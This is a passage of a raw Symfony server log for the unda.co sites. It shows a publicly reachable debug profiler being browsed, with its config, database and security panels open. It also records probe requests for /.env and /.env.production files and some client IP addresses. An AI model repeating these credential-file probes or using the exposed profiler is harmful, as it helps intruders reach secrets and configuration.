  5828. [2025-12-19 20:31:15] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"e607d2","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/e607d2/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  5829. [2025-12-19 20:31:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  5830. [2025-12-19 20:31:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5831. [2025-12-19 20:33:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"89d052","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/89d052?group=1&panel=db","method":"GET"} []
  5832. [2025-12-19 20:33:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
  5833. [2025-12-19 20:34:50] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"6c3cf6","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/6c3cf6/search/results?limit=10&method=GET","method":"GET"} []
  5834. [2025-12-19 20:34:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  5835. [2025-12-19 20:38:36] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5836. [2025-12-19 20:38:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5","method":"GET"} []
  5837. [2025-12-19 20:38:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  5838. [2025-12-19 20:42:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b27c2a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b27c2a?panel=time","method":"GET"} []
  5839. [2025-12-19 20:42:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  5840. [2025-12-19 21:07:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=logger","method":"GET"} []
  5841. [2025-12-19 21:07:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  5842. [2025-12-19 21:15:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2a8701","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2a8701?panel=router","method":"GET"} []
  5843. [2025-12-19 21:15:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  5844. [2025-12-19 21:16:54] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"174360","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/174360/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  5845. [2025-12-19 21:16:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  5846. [2025-12-19 21:19:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00a283","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/00a283?panel=time","method":"GET"} []
  5847. [2025-12-19 21:19:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  5848. [2025-12-19 21:21:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2fe6ee","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2fe6ee?panel=cache","method":"GET"} []
  5849. [2025-12-19 21:21:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  5850. [2025-12-19 21:24:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5851. [2025-12-19 21:25:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c86f8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c86f8?panel=twig","method":"GET"} []
  5852. [2025-12-19 21:25:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  5853. [2025-12-19 21:25:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5854. [2025-12-19 21:25:49] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  5855. [2025-12-19 21:35:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2fe6ee","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2fe6ee?panel=request","method":"GET"} []
  5856. [2025-12-19 21:35:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  5857. [2025-12-19 21:46:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2fe6ee","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2fe6ee","method":"GET"} []
  5858. [2025-12-19 21:46:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
  5859. [2025-12-19 21:49:25] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5860. [2025-12-19 21:54:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d669c6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d669c6?panel=dump","method":"GET"} []
  5861. [2025-12-19 21:54:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  5862. [2025-12-19 22:02:03] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5863. [2025-12-19 22:07:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"025fac","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/025fac?panel=dump","method":"GET"} []
  5864. [2025-12-19 22:07:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  5865. [2025-12-19 22:09:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03665","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b03665?panel=twig","method":"GET"} []
  5866. [2025-12-19 22:09:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  5867. [2025-12-19 22:09:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5868. [2025-12-19 22:09:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.production"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.production\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5869. [2025-12-19 22:11:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2fe6ee","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2fe6ee?panel=security","method":"GET"} []
  5870. [2025-12-19 22:11:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  5871. [2025-12-19 22:13:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap_index.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap_index.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5872. [2025-12-19 22:20:22] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  5873. [2025-12-19 22:28:29] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  5874. [2025-12-19 22:36:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2fe6ee","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2fe6ee?panel=config","method":"GET"} []
  5875. [2025-12-19 22:36:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  5876. [2025-12-19 22:36:17] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5877. [2025-12-19 22:36:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5878. [2025-12-19 22:45:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"14b2f9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/14b2f9?panel=exception","method":"GET"} []
  5879. [2025-12-19 22:45:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  5880. [2025-12-19 22:47:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"628fdc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/628fdc?panel=security","method":"GET"} []
  5881. [2025-12-19 22:47:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  5882. [2025-12-19 22:49:38] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"3562aa","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/3562aa/search/results?ip=189.172.83.228&limit=10&method=GET","method":"GET"} []
  5883. [2025-12-19 22:49:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.83.228&limit=10&method=GET","method":"GET"} []
  5884. [2025-12-19 22:52:32] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"2882d9","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/2882d9/search/results?ip=146.19.24.116&limit=10&method=GET","method":"GET"} []
  5885. [2025-12-19 22:52:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=146.19.24.116&limit=10&method=GET","method":"GET"} []
  5886. [2025-12-19 22:56:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d01650","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d01650?panel=router","method":"GET"} []
  5887. [2025-12-19 22:56:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  5888. [2025-12-19 22:57:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cb60d4","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/cb60d4?panel=config","method":"GET"} []
  5889. [2025-12-19 22:57:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  5890. [2025-12-19 23:00:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"759d74","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/759d74?panel=dump","method":"GET"} []
  5891. [2025-12-19 23:00:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  5892. [2025-12-19 23:04:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f4dabc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f4dabc?panel=config","method":"GET"} []
  5893. [2025-12-19 23:04:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  5894. [2025-12-19 23:10:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"aae23e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/aae23e","method":"GET"} []
  5895. [2025-12-19 23:10:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  5896. [2025-12-19 23:12:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5897. [2025-12-19 23:17:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /version"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /version\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5898. [2025-12-19 23:20:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"759d74","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/759d74?panel=db","method":"GET"} []
  5899. [2025-12-19 23:20:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  5900. [2025-12-19 23:36:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4d9f23","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/4d9f23?panel=swiftmailer","method":"GET"} []
  5901. [2025-12-19 23:36:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  5902. [2025-12-19 23:36:19] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"ddce90","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/ddce90/search/results?limit=10&method=GET","method":"GET"} []
  5903. [2025-12-19 23:36:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  5904. [2025-12-19 23:42:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c98e4d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c98e4d?panel=exception","method":"GET"} []
  5905. [2025-12-19 23:42:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  5906. [2025-12-19 23:49:18] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5907. [2025-12-19 23:53:11] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  5908. [2025-12-19 23:53:11] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  5909. [2025-12-19 23:53:11] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5910. [2025-12-19 23:53:11] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5911. [2025-12-19 23:53:11] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  5912. [2025-12-19 23:53:11] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  5913. [2025-12-19 23:53:11] security.DEBUG: Calling Authentication entry point. [] []
  5914. [2025-12-19 23:54:12] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  5915. [2025-12-19 23:54:12] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  5916. [2025-12-19 23:54:12] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5917. [2025-12-19 23:54:12] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5918. [2025-12-19 23:54:12] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  5919. [2025-12-19 23:54:12] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  5920. [2025-12-19 23:54:12] security.DEBUG: Calling Authentication entry point. [] []
  5921. [2025-12-19 23:54:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1fcc47","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1fcc47?panel=db","method":"GET"} []
  5922. [2025-12-19 23:54:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  5923. [2025-12-19 23:55:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=exception","method":"GET"} []
  5924. [2025-12-19 23:55:07] request.INFO: Matched route "_profiler_exception_css". {"route":"_profiler_exception_css","route_parameters":{"_controller":"web_profiler.controller.exception:cssAction","token":"5f0320","_route":"_profiler_exception_css"},"request_uri":"https://www.unda.co/_profiler/5f0320/exception.css","method":"GET"} []
  5925. [2025-12-19 23:55:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  5926. [2025-12-19 23:55:07] request.INFO: Matched route "_profiler_exception". {"route":"_profiler_exception","route_parameters":{"_controller":"web_profiler.controller.exception:showAction","token":"5f0320","_route":"_profiler_exception"},"request_uri":"https://www.unda.co/_profiler/5f0320/exception","method":"GET"} []
  5927. [2025-12-19 23:57:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"836ec4","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/836ec4?group=1&panel=db","method":"GET"} []
  5928. [2025-12-19 23:57:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
